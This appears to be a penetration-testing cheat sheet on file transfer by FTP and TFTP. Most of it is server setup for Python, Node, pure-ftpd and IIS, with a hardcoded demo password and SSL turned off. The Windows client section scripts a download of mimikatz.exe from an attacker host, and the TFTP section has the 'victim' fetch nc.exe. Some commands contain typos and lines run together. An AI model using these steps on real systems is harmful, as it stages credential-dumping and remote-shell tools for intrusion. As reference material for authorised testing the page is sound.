⭕FTP
FTP server
# python
pip3 install pyftpdlib
python3 -m pyftpdlib -p 21
# NodeJS
sudo npm install -g ftp-srv --save
ftp-srv ftp://0.0.0.0:9876 --root /tmp
# pure-ftp
apt-get update && apt-get install pure-ftp
#Run the following script to configure the FTP server
#!/bin/bash
groupadd ftpgroup
useradd -g ftpgroup -d /dev/null -s /etc ftpuser
pure-pwd useradd fusr -u ftpuser -d /ftphome
pure-pw mkdb
cd /etc/pure-ftpd/auth/
ln -s ../conf/PureDB 60pdb
mkdir -p /ftphome
chown -R ftpuser:ftpgroup /ftphome/
/etc/init.d/pure-ftpd restartWindows Client
#Work well with python. With pure-ftp use fusr:ftp
echo open 10.11.0.41 21 > ftp.txt
echo USER anonymous >> ftp.txt
echo anonymous >> ftp.txt
echo bin >> ftp.txt
echo GET mimikatz.exe >> ftp.txt
echo bye >> ftp.txt
ftp -n -v -s:ftp.txtTFTP
By default in XP and 2003 (in others it need to be explicitly added during installation)
In Kali, start TFTP server:
#I didn't get this options working and I prefer the python option
mkdir /tftp
atftpd --daemon --port 69 /tftp
cp /path/tp/nc.exe /tftpTFTP server in python:
pip install ptftpd
ptftpd -p 69 tap0 . # ptftp -p <PORT> <IFACE> <FOLDER>In victim, connect to the Kali server:
tftp -i <KALI-IP> get nc.exeWindows FTP Server Powershell
#Install IIS Feature
Install-WindowsFeature -Name Web-Server -IncludeManagementTools
#Install FTP feature
Install-WindowsFeature -Name Web-Ftp-Server -IncludeAllSubFeature -IncludeManagementTools -Verbose
#Creating new FTP site
$SiteName = "Demo FTP Site"
$RootFolderpath = "C:\DemoFTPRoot"
$PortNumber = 21
$FTPUserGroupName = "Demo FTP Users Group"
$FTPUserName = "FtpUser"
$FTPPassword = ConvertTo-SecureString "p@ssw0rd" -AsPlainText -Force
if (!(Test-Path $RootFolderpath)) {
# if the folder doesn't exist
New-Item -Path $RootFolderpath -ItemType Directory # create the folder
}
New-WebFtpSite -Name $SiteName -PhysicalPath $RootFolderpath -Port $PortNumber -Verbose -Force
#Creating the local Windows group
if (!(Get-LocalGroup $FTPUserGroupName -ErrorAction SilentlyContinue)) {
#if the group doesn't exist
New-LocalGroup -Name $FTPUserGroupName `
-Description "Members of this group can connect to FTP server" #create the group
}
# Creating an FTP user
If (!(Get-LocalUser $FTPUserName -ErrorAction SilentlyContinue)) {
New-LocalUser -Name $FTPUserName -Password $FTPPassword `
-Description "User account to access FTP server" `
-UserMayNotChangePassword
}
# Add the created FTP user to the group Demo FTP Users Group
Add-LocalGroupMember -Name $FTPUserGroupName -Member $FTPUserName -ErrorAction SilentlyContinue
# Enabling basic authentication on the FTP site
$param = @{
Path = 'IIS:\Sites\Demo FTP Site'
Name = 'ftpserver.security.authentication.basicauthentication.enabled'
Value = $true
Verbose = $True
}
Set-ItemProperty @param
# Adding authorization rule to allow FTP users
# in the FTP group to access the FTP site
$param = @{
PSPath = 'IIS:\'
Location = $SiteName
Filter = '/system.ftpserver/security/authorization'
Value = @{ accesstype = 'Allow'; roles = $FTPUserGroupName; permissions = 1 }
}
Add-WebConfiguration @param
# Changing SSL policy of the FTP site
'ftpServer.security.ssl.controlChannelPolicy', 'ftpServer.security.ssl.dataChannelPolicy' |
ForEach-Object {
Set-ItemProperty -Path "IIS:\Sites\Demo FTP Site" -Name $_ -Value $false
}
$ACLObject = Get-Acl -Path $RootFolderpath
$ACLObject.SetAccessRule(
( # Access rule object
New-Object System.Security.AccessControl.FileSystemAccessRule(
$FTPUserGroupName,
'ReadAndExecute',
'ContainerInherit,ObjectInherit',
'None',
'Allow'
)
)
)
Set-Acl -Path $RootFolderpath -AclObject $ACLObject
# Checking the NTFS permissions on the FTP root folder
Get-Acl -Path $RootFolderpath | ForEach-Object Access
# Test FTP Port and FTP access
Test-NetConnection -ComputerName localhost -Port 21
ftp localhostFTP From Browser
ftp://ftp.example.comLast updated
